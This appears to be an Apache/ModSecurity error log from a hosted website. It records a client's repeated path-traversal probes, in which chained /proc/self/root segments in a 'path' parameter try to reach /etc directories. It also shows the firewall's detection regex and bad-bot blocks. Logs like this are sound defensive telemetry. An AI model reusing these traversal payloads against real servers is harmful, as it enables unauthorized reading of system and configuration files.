https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 19:38:21.524999 2026] [:error] [pid 31803:tid 140411666392832] [client 74.7.241.31:38154] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnX3eyqAr6etmhZHNpHFQAAAEk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 19:38:24.044426 2026] [:error] [pid 6296:tid 140411565680384] [client 74.7.241.31:38156] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnX4HIk7brgkOH-rIWsWAAAAVU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 19:38:24.813619 2026] [:error] [pid 19507:tid 140411699963648] [client 74.7.243.128:55808] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnX4NY0UrI5A3LftIwehgAAAYU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 19:38:25.720216 2026] [:error] [pid 7004:tid 140411741927168] [client 74.7.241.31:38158] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnX4cU6Sx0TG1YjmQjOjgAAAoA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 19:38:27.875638 2026] [:error] [pid 31803:tid 140411658000128] [client 74.7.241.31:47154] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnX4-yqAr6etmhZHNpHFwAAAEo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 19:38:29.375722 2026] [:error] [pid 26799:tid 140411699963648] [client 74.7.241.31:47162] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnX5da6ubjKNq_cu4YmyAAAA0U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 19:38:38.133794 2026] [proxy_fcgi:error] [pid 7004:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:40702] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:38:41.308601 2026] [:error] [pid 31803:tid 140411733534464] [client 74.7.241.31:47720] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnX8OyqAr6etmhZHNpHGQAAAEE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 19:38:42.876096 2026] [:error] [pid 19507:tid 140411565680384] [client 74.7.241.31:47732] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnX8tY0UrI5A3LftIweiQAAAZU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 19:38:44.208803 2026] [:error] [pid 7004:tid 140411607643904] [client 74.7.241.31:47742] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnX9MU6Sx0TG1YjmQjOlAAAApA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 19:39:01.092060 2026] [proxy_fcgi:error] [pid 31803:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:40982] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:39:09.211256 2026] [:error] [pid 11816:tid 140411741927168] [client 74.7.241.31:47744] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnYDew_le52K8_3pV1tAAAAAgA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 19:39:12.119292 2026] [:error] [pid 25836:tid 140411716749056] [client 74.7.241.31:46374] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnYEIh-PF_25v4hFRCJvwAAAQM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 19:39:13.853042 2026] [:error] [pid 11088:tid 140411649607424] [client 74.7.241.31:46386] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnYEWmqtCojLHvu5cKJFQAAAIs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 19:39:23.128960 2026] [proxy_fcgi:error] [pid 2598:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:41176] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:39:45.125886 2026] [proxy_fcgi:error] [pid 25836:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:41412] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:39:49.673578 2026] [core:alert] [pid 2598:tid 140411616036608] [client 74.7.243.128:35544] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/usr/lib/firmware
[Tue Mar 17 19:40:07.129772 2026] [proxy_fcgi:error] [pid 11816:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:41672] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:40:30.959181 2026] [proxy_fcgi:error] [pid 29151:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:41934] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:40:52.133825 2026] [proxy_fcgi:error] [pid 11088:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:42374] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:40:57.366835 2026] [:error] [pid 25836:tid 140411632822016] [client 74.7.241.31:39864] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnYeYh-PF_25v4hFRCJ7wAAAQ0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 19:41:14.133412 2026] [proxy_fcgi:error] [pid 29151:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:42824] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:41:36.069841 2026] [proxy_fcgi:error] [pid 29151:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:43062] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:41:43.571067 2026] [:error] [pid 19507:tid 140411590858496] [client 74.7.244.43:41528] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abnYp9Y0UrI5A3LftIwerQAAAZI"]
[Tue Mar 17 19:41:44.308805 2026] [:error] [pid 31803:tid 140411683178240] [client 74.7.228.61:35462] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abnYqOyqAr6etmhZHNpHNwAAAEc"]
[Tue Mar 17 19:41:58.113838 2026] [proxy_fcgi:error] [pid 25836:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:43448] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:42:21.129833 2026] [proxy_fcgi:error] [pid 29151:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:43790] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:42:26.041844 2026] [mime_magic:error] [pid 11088:tid 140411666392832] (70014)End of file found: [client 74.7.241.31:46844] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/var/run/systemd
[Tue Mar 17 19:42:43.129871 2026] [proxy_fcgi:error] [pid 31803:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:44016] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:42:54.463332 2026] [:error] [pid 29151:tid 140411599251200] [client 74.7.241.31:33116] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnY7vPqhzTj3BvfDX-nhAAAAdE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 19:43:06.133814 2026] [proxy_fcgi:error] [pid 7004:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:44334] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:43:11.098602 2026] [:error] [pid 11088:tid 140411548894976] [client 74.7.243.128:49584] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnY_2mqtCojLHvu5cKJZgAAAJc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 19:43:15.624881 2026] [:error] [pid 6296:tid 140411590858496] [client 74.7.241.31:43066] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnZA3Ik7brgkOH-rIWsnQAAAVI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 19:43:25.257581 2026] [:error] [pid 11088:tid 140411716749056] [client 74.7.243.128:49584] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnZDWmqtCojLHvu5cKJbwAAAIM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 19:43:28.137850 2026] [proxy_fcgi:error] [pid 29151:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:44568] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:43:50.046036 2026] [proxy_fcgi:error] [pid 2598:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:44820] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:44:13.085834 2026] [proxy_fcgi:error] [pid 26799:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:45094] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:44:35.141837 2026] [proxy_fcgi:error] [pid 29151:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:45392] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:44:40.408724 2026] [:error] [pid 2598:tid 140411741927168] [client 74.7.241.31:44644] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnZWBj0p0SRWAqcjGGZuQAAAwA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
